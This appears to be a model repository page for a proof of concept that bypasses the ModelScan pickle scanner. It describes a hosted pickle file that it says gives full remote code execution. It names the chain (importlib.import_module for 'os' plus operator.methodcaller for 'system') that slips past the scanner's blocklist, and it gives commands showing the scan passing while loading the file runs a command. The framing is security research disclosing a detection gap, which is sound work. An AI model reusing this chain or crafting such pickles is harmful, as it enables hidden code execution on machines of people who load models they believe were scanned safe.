Pickle Scanner Bypass PoC
Security research โ ModelScan pickle scanner evasion via incomplete blocklist.
File
bypass_rce.pkl(111 bytes) โ Full RCE payload that evades ModelScan detection
Bypass Chain
importlib.import_module("os") + operator.methodcaller("system", cmd) = RCE
Both importlib and operator.methodcaller are absent from ModelScan's blocklist.
Reproduce
# Scan โ reports zero issues (false negative)
modelscan -p bypass_rce.pkl
# Load โ executes arbitrary command
python3 -c "import pickle; pickle.load(open('bypass_rce.pkl', 'rb'))"
# Output: PWNED_VIA_MODELSCAN_BYPASS
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐ Ask for provider support